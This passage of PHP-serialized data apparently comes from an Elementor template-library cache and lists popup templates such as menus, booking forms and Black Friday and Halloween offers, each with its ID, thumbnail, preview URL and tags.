Consultant\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/baby-sleep-consultant-small-1.jpg\";s:12:\"tmpl_created\";i:1647778954;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/baby-sleep-consultant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:66;a:20:{s:4:\"tmpl\";i:1349;s:2:\"id\";i:23077;s:5:\"title\";s:46:\"Classic | Subscription | Baby Sleep Consultant\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/baby-sleep-consultant-small.jpg\";s:12:\"tmpl_created\";i:1647779074;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/classic-subscription-baby-sleep-consultant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:12:\"[\"Discount\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:67;a:20:{s:4:\"tmpl\";i:1350;s:2:\"id\";i:23090;s:5:\"title\";s:33:\"Full Screen | Menu | Luxury Hotel\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/luxury-hotel-small.jpg\";s:12:\"tmpl_created\";i:1647779390;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/full-screen-menu-luxury-hotel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:68;a:20:{s:4:\"tmpl\";i:1351;s:2:\"id\";i:23100;s:5:\"title\";s:31:\"Fly-In | Booking | Luxury Hotel\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/luxury-hotel-small-1.jpg\";s:12:\"tmpl_created\";i:1647779500;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-booking-luxury-hotel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Booking\",\"Travel\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:69;a:20:{s:4:\"tmpl\";i:1352;s:2:\"id\";i:23109;s:5:\"title\";s:38:\"Full Screen | Menu | Design Conference\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/design-conference-35-small.jpg\";s:12:\"tmpl_created\";i:1647779675;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-menu-design-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:70;a:20:{s:4:\"tmpl\";i:1353;s:2:\"id\";i:23120;s:5:\"title\";s:41:\"Full Screen | Booking | Design Conference\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/design-conference-35-small-1.jpg\";s:12:\"tmpl_created\";i:1647779793;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/full-screen-booking-design-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:35:\"[\"Booking\",\"Conference\",\"Creative\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:71;a:20:{s:4:\"tmpl\";i:1354;s:2:\"id\";i:23129;s:5:\"title\";s:29:\"Slide-In | Menu | VR Headsets\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/VR-headset-small.jpg\";s:12:\"tmpl_created\";i:1647781211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/slide-in-menu-vr-headsets/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:72;a:20:{s:4:\"tmpl\";i:1355;s:2:\"id\";i:23139;s:5:\"title\";s:31:\"Classic | Contact | VR Headsets\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/VR-headset-small-1.jpg\";s:12:\"tmpl_created\";i:1647781384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-contact-vr-headsets/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:73;a:20:{s:4:\"tmpl\";i:1356;s:2:\"id\";i:23149;s:5:\"title\";s:38:\"Slide-In | Menu | Portrait Photography\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/48-portrair-photography-Menu.jpg\";s:12:\"tmpl_created\";i:1647782336;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/slide-in-menu-portrait-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:74;a:20:{s:4:\"tmpl\";i:1357;s:2:\"id\";i:23159;s:5:\"title\";s:47:\"Hello Bar | Subscription | Portrait Photography\";s:9:\"thumbnail\";s:97:\"https://library.elementor.com/wp-content/uploads/2022/03/48-portrair-photography-Subscription.jpg\";s:12:\"tmpl_created\";i:1647782478;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/hello-bar-subscription-portrait-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:34:\"[\"Blog\",\"Photography\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:75;a:20:{s:4:\"tmpl\";i:1358;s:2:\"id\";i:23169;s:5:\"title\";s:32:\"Full Screen | Menu | English Pub\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/49-englisg-pub-Menu.jpg\";s:12:\"tmpl_created\";i:1647782664;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/full-screen-menu-english-pub/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:76;a:20:{s:4:\"tmpl\";i:1359;s:2:\"id\";i:23179;s:5:\"title\";s:32:\"Classic | Discount | English Pub\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/49-englisg-pub-Discount.jpg\";s:12:\"tmpl_created\";i:1647782796;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-discount-english-pub/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:20:\"[\"Discount\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:77;a:20:{s:4:\"tmpl\";i:1360;s:2:\"id\";i:23189;s:5:\"title\";s:27:\"Full Screen | Menu | Singer\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/58-Music-Artist-Menu.jpg\";s:12:\"tmpl_created\";i:1647783070;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/full-screen-menu-singer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:29:\"[\"Fullscreen\",\"menu\",\"Music\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:78;a:20:{s:4:\"tmpl\";i:1361;s:2:\"id\";i:23200;s:5:\"title\";s:31:\"Classic | Subscription | Singer\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/58-Music-Artist-Subscription.jpg\";s:12:\"tmpl_created\";i:1647783249;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-subscription-singer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Music\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:79;a:20:{s:4:\"tmpl\";i:1362;s:2:\"id\";i:23210;s:5:\"title\";s:38:\"Full Screen | Menu | Virtual Assistant\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/virtual-assistnt-73-small.jpg\";s:12:\"tmpl_created\";i:1647784292;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-menu-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:80;a:20:{s:4:\"tmpl\";i:1363;s:2:\"id\";i:23223;s:5:\"title\";s:39:\"Hello Bar | Contact | Virtual Assistant\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/73-Virtual-Assistant-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647784616;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-contact-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:37:\"[\"Contact\",\"Psychologist\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:81;a:20:{s:4:\"tmpl\";i:1364;s:2:\"id\";i:23234;s:5:\"title\";s:32:\"Slide-In  | Menu | Personal Chef\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/74-Personal-Chef-Menu.jpg\";s:12:\"tmpl_created\";i:1647798194;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/slide-in-menu-personal-chef/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:82;a:20:{s:4:\"tmpl\";i:1365;s:2:\"id\";i:23244;s:5:\"title\";s:29:\"Classic | CTA | Personal Chef\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/74-Personal-Chef-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647798297;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-personal-chef/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Booking\",\"Chef\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:83;a:20:{s:4:\"tmpl\";i:1366;s:2:\"id\";i:23254;s:5:\"title\";s:31:\"Full Screen | Menu | Food Truck\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/food-truck-76-small-1.jpg\";s:12:\"tmpl_created\";i:1647798447;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/full-screen-menu-food-truck/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:84;a:20:{s:4:\"tmpl\";i:1367;s:2:\"id\";i:23265;s:5:\"title\";s:30:\"Fly-In | Discount | Food Truck\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/food-truck-76-small.jpg\";s:12:\"tmpl_created\";i:1647798657;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-discount-food-truck/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Discount\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:85;a:20:{s:4:\"tmpl\";i:1369;s:2:\"id\";i:23323;s:5:\"title\";s:28:\"Classic | CTA | Black Friday\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-6-Small.jpg\";s:12:\"tmpl_created\";i:1647855505;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-cta-black-friday/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:86;a:20:{s:4:\"tmpl\";i:1370;s:2:\"id\";i:23329;s:5:\"title\";s:29:\"Slide-In | CTA | Black Friday\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-5-Small.jpg\";s:12:\"tmpl_created\";i:1647855865;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/slide-in-cta-black-friday/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:87;a:20:{s:4:\"tmpl\";i:1371;s:2:\"id\";i:23335;s:5:\"title\";s:31:\"Slide-In | CTA | Black Friday 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-1-Small.jpg\";s:12:\"tmpl_created\";i:1647856357;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/slide-in-cta-black-friday-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:88;a:20:{s:4:\"tmpl\";i:1372;s:2:\"id\";i:23341;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 2\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-3-Small.jpg\";s:12:\"tmpl_created\";i:1647856493;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:89;a:20:{s:4:\"tmpl\";i:1373;s:2:\"id\";i:23347;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 3\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-2-Small.jpg\";s:12:\"tmpl_created\";i:1647856891;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:90;a:20:{s:4:\"tmpl\";i:1374;s:2:\"id\";i:23354;s:5:\"title\";s:30:\"Classic | CTA | Black Friday 4\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/Black-Friday-4-Small.jpg\";s:12:\"tmpl_created\";i:1647856996;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-black-friday-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Black Friday\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:91;a:20:{s:4:\"tmpl\";i:1375;s:2:\"id\";i:23394;s:5:\"title\";s:27:\"Classic | CTA | Halloween 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-3-Small.jpg\";s:12:\"tmpl_created\";i:1647857351;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-halloween-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:31:\"[\"cta\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:92;a:20:{s:4:\"tmpl\";i:1376;s:2:\"id\";i:23401;s:5:\"title\";s:33:\"Slide-In | Discount | Halloween 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-2-Small.jpg\";s:12:\"tmpl_created\";i:1647857567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-halloween-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:36:\"[\"Discount\",\"Ecommerce\",\"Halloween\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:93;a:20:{s:4:\"tmpl\";i:1377;s:2:\"id\";i:23407;s:5:\"title\";s:33:\"Slide-In | Discount | Halloween 